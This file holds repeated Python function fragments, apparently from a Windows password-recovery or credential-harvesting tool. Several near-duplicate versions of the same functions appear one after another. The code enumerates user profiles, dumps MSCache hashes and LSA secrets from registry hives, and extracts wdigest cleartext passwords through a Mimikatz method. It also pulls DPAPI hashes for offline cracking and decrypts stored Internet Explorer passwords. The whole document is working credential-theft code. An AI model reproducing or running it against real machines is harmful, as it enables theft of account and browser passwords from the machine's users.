def get_user_list_on_filesystem(impersonated_user=[]):
"""
Get user list to retrieve their passwords
"""
# Check users existing on the system (get only directories)
user_path = u'{drive}:\\Users'.format(drive=constant.drive)
if float(get_os_version()) < 6:
user_path = u'{drive}:\\Documents and Settings'.format(
drive=constant.drive)
all_users = []
if os.path.exists(user_path):
all_users = [
filename for filename in os.listdir(user_path)
if os.path.isdir(os.path.join(user_path, filename))
]
# Remove default users
for user in [
'All Users', 'Default User', 'Default', 'Public', 'desktop.ini'
]:
if user in all_users:
all_users.remove(user)
# Removing user that have already been impersonated
for imper_user in impersonated_user:
if imper_user in all_users:
all_users.remove(imper_user)
return all_users
def run(self):
is_vista_or_higher = False
if float(get_os_version()) >= 6.0:
is_vista_or_higher = True
mscache = dump_file_hashes(constant.hives['system'], constant.hives['security'], is_vista_or_higher)
if mscache:
return ['__MSCache__', mscache]
def run(self):
"""
- Try to decrypt wdigest password using mimikatz method (only work on Win7 and Vista)
- Try to check if an already passwords is also used as windows password
- Windows password not found, return the DPAPI hash (not admin priv needed) to bruteforce using John or Hashcat
"""
pwd_found = []
# Check if Admin
if ctypes.windll.shell32.IsUserAnAdmin() != 0:
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms724832(v=vs.85).aspx
supported_os = {
'6.0': 'Vista',
'6.1': 'Win7',
}
os_version = get_os_version()
if os_version in supported_os:
os = supported_os[os_version]
arch = 'x86'
if isx64machine():
arch = 'x64'
if get_debug_privilege():
# Ready to found passwords
self.info('Using mimikatz method')
m = Mimikatz(os=os, arch=arch)
pwd_found = m.find_wdigest_password()
if not pwd_found:
if constant.dpapi:
# Check if a password already found is a windows password
password = constant.dpapi.get_cleartext_password()
if password:
pwd_found.append({
'Login': constant.username,
'Password': password
})
else:
# Retrieve dpapi hash used to bruteforce (hash can be retrieved without needed admin privilege)
# Method taken from Jean-Christophe Delaunay - @Fist0urs
# https://www.synacktiv.com/ressources/univershell_2017_dpapi.pdf
self.info(u'Windows passwords not found.\nTry to bruteforce this hash (using john or hashcat) '
u'depending on your context (domain environment or not)')
if constant.dpapi:
context = 'local'
if self.is_in_domain():
context = 'domain'
h = constant.dpapi.get_dpapi_hash(context=context)
if h:
pwd_found.append({
'Dpapi_hash_{context}'.format(context=context): constant.dpapi.get_dpapi_hash(
context=context)
})
return pwd_found
def run(self, historic=''):
if float(win.get_os_version()) > 6.1:
print_debug(
'INFO',
u'Internet Explorer passwords are stored in Vault (check vault module)'
)
return
pwd_found = []
try:
hkey = win.OpenKey(
win.HKEY_CURRENT_USER,
'Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2'
)
except Exception:
print_debug('DEBUG', traceback.format_exc())
else:
nb_site = 0
nb_pass_found = 0
lists = []
if historic:
if os.path.exists(historic):
f = open(historic, 'r')
for line in f:
lists.append(line.strip())
else:
print_debug('WARNING',
u'The text file %s does not exist' % historic)
# retrieve the urls from the history
hash_tables = self.get_hash_table(lists)
num = _winreg.QueryInfoKey(hkey)[1]
for x in range(0, num):
k = _winreg.EnumValue(hkey, x)
if k:
nb_site += 1
for h in hash_tables:
# both hash are similar, we can decipher the password
if h[1] == k[0][:40].lower():
nb_pass_found += 1
cipher_text = k[1]
pwd_found += self.decipher_password(
cipher_text, h[0])
break
_winreg.CloseKey(hkey)
# manage errors
if nb_site > nb_pass_found:
print_debug(
'ERROR',
u'%s hashes have not been decrypted, the associate website used to decrypt the '
u'passwords has not been found' %
str(nb_site - nb_pass_found))
return pwd_found
def run(self):
is_vista_or_higher = False
if float(get_os_version()) >= 6.0:
is_vista_or_higher = True
mscache = dump_file_hashes(constant.hives['system'],
constant.hives['security'],
is_vista_or_higher)
if mscache:
return ['__MSCache__', mscache]
def run(self):
if float(win.get_os_version()) > 6.1:
self.debug(
u'Internet Explorer passwords are stored in Vault (check vault module)'
)
return
pwd_found = []
try:
hkey = win.OpenKey(
win.HKEY_CURRENT_USER,
'Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2'
)
except Exception:
self.debug(traceback.format_exc())
else:
nb_site = 0
nb_pass_found = 0
# retrieve the urls from the history
hash_tables = self.get_hash_table()
num = winreg.QueryInfoKey(hkey)[1]
for x in range(0, num):
k = winreg.EnumValue(hkey, x)
if k:
nb_site += 1
for h in hash_tables:
# both hash are similar, we can decipher the password
if h[1] == k[0][:40].lower():
nb_pass_found += 1
cipher_text = k[1]
pwd_found += self.decipher_password(
cipher_text, h[0])
break
winreg.CloseKey(hkey)
# manage errors
if nb_site > nb_pass_found:
self.error(
u'%s hashes have not been decrypted, the associate website used to decrypt the '
u'passwords has not been found' %
str(nb_site - nb_pass_found))
return pwd_found
def run(self):
# DPAPI structure could compute lsa secrets as well, so do not do it again
if constant.lsa_secrets:
return ['__LSASecrets__', constant.lsa_secrets]
is_vista_or_higher = False
if float(get_os_version()) >= 6.0:
is_vista_or_higher = True
# Get LSA Secrets
secrets = get_file_secrets(constant.hives['system'], constant.hives['security'], is_vista_or_higher)
if secrets:
# Clear DPAPI master key
clear = secrets['DPAPI_SYSTEM']
size = struct.unpack_from("<L", clear)[0]
secrets['DPAPI_SYSTEM'] = clear[16:16 + 44]
# Keep value to be reused in other module (e.g wifi)
constant.lsa_secrets = secrets
return ['__LSASecrets__', secrets]
def run(self):
if float(win.get_os_version()) > 6.1:
self.debug(u'Internet Explorer passwords are stored in Vault (check vault module)')
return
pwd_found = []
try:
hkey = win.OpenKey(win.HKEY_CURRENT_USER, 'Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2')
except Exception:
self.debug(traceback.format_exc())
else:
nb_site = 0
nb_pass_found = 0
# retrieve the urls from the history
hash_tables = self.get_hash_table()
num = winreg.QueryInfoKey(hkey)[1]
for x in range(0, num):
k = winreg.EnumValue(hkey, x)
if k:
nb_site += 1
for h in hash_tables:
# both hash are similar, we can decipher the password
if h[1] == k[0][:40].lower():
nb_pass_found += 1
cipher_text = k[1]
pwd_found += self.decipher_password(cipher_text, h[0])
break
winreg.CloseKey(hkey)
# manage errors
if nb_site > nb_pass_found:
self.error(u'%s hashes have not been decrypted, the associate website used to decrypt the '
u'passwords has not been found' % str(nb_site - nb_pass_found))
return pwd_found
def get_user_list_on_filesystem(impersonated_user=[]):
"""
Get user list to retrieve their passwords
"""
# Check users existing on the system (get only directories)
user_path = u'{drive}:\\Users'.format(drive=constant.drive)
if float(get_os_version()) < 6:
user_path = u'{drive}:\\Documents and Settings'.format(drive=constant.drive)
all_users = []
if os.path.exists(user_path):
all_users = [filename for filename in os.listdir(user_path) if os.path.isdir(os.path.join(user_path, filename))]
# Remove default users
for user in ['All Users', 'Default User', 'Default', 'Public', 'desktop.ini']:
if user in all_users:
all_users.remove(user)
# Removing user that have already been impersonated
for imper_user in impersonated_user:
if imper_user in all_users:
all_users.remove(imper_user)
return all_users